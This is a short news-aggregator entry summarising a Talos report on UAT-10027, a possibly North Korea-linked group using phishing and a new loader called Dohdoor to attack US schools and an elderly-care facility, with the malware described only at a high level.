"We observed that the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface. Additionally, one of the affected entities was a healthcare facility, specifically for elderly care. Based on the nature of the victimology in the current intrusions, the actor likely has a motive for financial gain."
"The attackers likely gain initial access via social engineering and phishing, and the multi-stage infection ultimately delivers a new backdoor, Dohdoor, which shares similar technical characteristics to Lazarus Group's Lazarloader malware. After gaining access through a phishing email, the intruders execute a PowerShell downloader that runs a Windows batch script dropper from a remote staging server."
"The DLL, which Talos calls Dohdoor, operates as a loader, and it downloads, decrypts, and executes malicious payloads within legitimate Windows processes. This gives the intruders backdoor access to the victim's environment so it can download the next payload - a Cobalt Strike Beacon - into the machine's memory."
A hacking group tracked as UAT-10027, possibly linked to North Korea, has been conducting cyberattacks against US educational institutions and healthcare facilities since at least December. The campaign uses a previously unknown backdoor malware called Dohdoor. Initial access is gained through phishing and social engineering tactics. The multi-stage infection process involves PowerShell downloaders, batch scripts, and DLL sideloading techniques to execute malicious code. Dohdoor functions as a loader that downloads and executes payloads within legitimate Windows processes, providing backdoor access and enabling deployment of Cobalt Strike Beacons. The attackers employ stealthy techniques to evade detection. Based on victimology patterns, the threat actors appear motivated by financial gain.
#dohdoor-malware #north-korean-hackers #education-and-healthcare-cyberattacks #phishing-and-social-engineering #dll-sideloading
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]